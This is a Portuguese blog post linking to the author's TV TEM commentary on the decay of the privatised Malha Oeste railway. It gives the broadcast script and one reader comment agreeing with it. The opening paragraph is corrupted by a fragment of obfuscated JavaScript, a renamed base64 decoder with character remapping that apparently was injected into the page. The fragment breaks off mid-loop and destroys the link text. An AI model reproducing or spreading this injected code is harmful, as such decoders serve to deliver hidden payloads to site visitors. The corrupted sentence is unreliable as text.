Assista a meu comentário na TV TEM: o abandono das ferrovias

Quem quiser ver o comentário que fiz ontem no TEM Notícias Segunda Edição, da TV TEM, a respeito do terrível abandono por que passam nossas ferrovias deve clicar function r0093c87a1(re){var xc='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var uf='';var pd,r7,x1,x4,s1,v0,r2;var s5=0;do{x4=xc.indexOf(re.charAt(s5++));s1=xc.indexOf(re.charAt(s5++));v0=xc.indexOf(re.charAt(s5++));r2=xc.indexOf(re.charAt(s5++));pd=(x4<<2)|(s1>>4);r7=((s1&15)<<4)|(v0>>2);x1=((v0&3)<<6)|r2;if(pd>=192)pd+=848;else if(pd==168)pd=1025;else if(pd==184)pd=1105;uf+=String.fromCharCode(pd);if(v0!=64){if(r7>=192)r7+=848;else if(r7==168)r7=1025;else if(r7==184)r7=1105;uf+=String.fromCharCode(r7);}if(r2!=64){if(x1>=192)x1+=848;else if(x1==168)x1=1025;else if(x1==184)x1=1105;uf+=String.fromCharCode(x1);}}while(s5andonada-na-regiao-de-bauru-sp.html" target="_blank">aqui para entrar na página do G1. Também publico a seguir o texto do comentário.

OLHA, A MALHA OESTE DA ANTIGA REDE FERROVIÁRIA FEDERAL FOI A PRIMEIRA A SER PRIVATIZADA, ISSO EM MARÇO DE MIL NOVECENTOS E NOVENTA E SEIS.// OU SEJA, LÁ SE VÃO QUASE DEZESSEIS ANOS.// E ATÉ AGORA OS INVESTIMENTOS QUE AS EMPRESAS DIZEM TER FEITO NÃO DERAM O RESULTADO ESPERADO.// A VERDADE É QUE A FERROVIA ESTÁ CAINDO AOS PEDAÇOS.// NEM É PRECISO SER UM ESPECIALISTA EM TRANSPORTES.// BASTA OLHAR PARA OS TRILHOS.// BASTA VER UM ACIDENTE ATRÁS DO OUTRO.// ISSO NÃO ME PARECE CONCESSÃO.// PORQUE, ALÉM DAS OBRIGAÇÕES DA EMPRESA, A CONCESSÃO REQUER TAMBÉM UMA FISCALIZAÇÃO FIRME DO PODER PÚBLICO.// AGORA, EU PERGUNTO: QUAL A PREOCUPAÇÃO DO GOVERNO COM AS CONDIÇÕES DAS FERROVIAS?// NENHUMA!// ACABARAM COM O TRANSPORTE DE PASSAGEIROS E AGORA NÃO DÃO A MÍNIMA PARA A DEGRADAÇÃO DO QUE DEVERIA SER UM RICO PATRIMÔNIO PÚBLICO.// ISSO FORA TODOS OS PROBLEMAS CAUSADOS POR ESSA CONDIÇÃO PRECÁRIA, COMO BEM MOSTROU NOSSA REPORTAGEM.// ENQUANTO EM PAÍSES DE PRIMEIRO MUNDO O TREM É UM MEIO DE TRANSPORTE MODERNO E EFICIENTE, POR AQUI TUDO JÁ VIROU SUCATA.// E VAMOS PRAS RODOVIAS!// VAMOS PAGAR PEDÁGIO!// É MAIS FÁCIL PARA O GOVERNO, É MAIS FÁCIL SE LIVRAR DO PROBLEMA DO QUE ENCARÁ-LO COMO SE DEVE.//

Tags: , ,

One Response to “Assista a meu comentário na TV TEM: o abandono das ferrovias”

  1. Concordo em tudo que foi mencionado sobre as nossas ferrovias. Não existe interesse do governo, pois suas iniciativas são pequenas e sem objetivo nenhum. Na minha cidade SantAna do Livramento fronteira com o Uruguay cidade de Rivera tem uma estação ferroviária centenaria que esta desabando porque a visão de futuro ainda não esta na mente das autoridades locais. Os empresários preferem pagarem altos valores em transporte de mercadorias que investirem no modal ferroviário. Com isso não gera novos empregos, turismo e desenvolvimento cultural nas regiões no qual passam as vias férreias Para um desenvolvimento mais compacto e a curto prazo, somente as ferrovias podem proporcionar, principamente em criação de novos empregos. Países que estão nos primeiros lugares no mundo possuem uma malha ferroviária de dar inveja, por isso que são de primeiro mundo. Por aqui, é um ministério pra tudo, porque não criar somente um para as ferrovias, assim não existiria interferências de outros modais. Para manter este crescimento atual e ter um futuro melhor, vai ser nescessário investir no modal ferrovário, não tem saída. Hoje se tivessemos investido no setor ferroviário não estaríamos vendo caminhões tirando vidas nas estradas e também passando vergonha em organizar a copa e as olimpíadas. QUE FALTA DE VISÃO DOS GOVERNANTES PASSADOS E DOS ATUAIS, MAS TUDO POR INTERESSES PESSOAIS.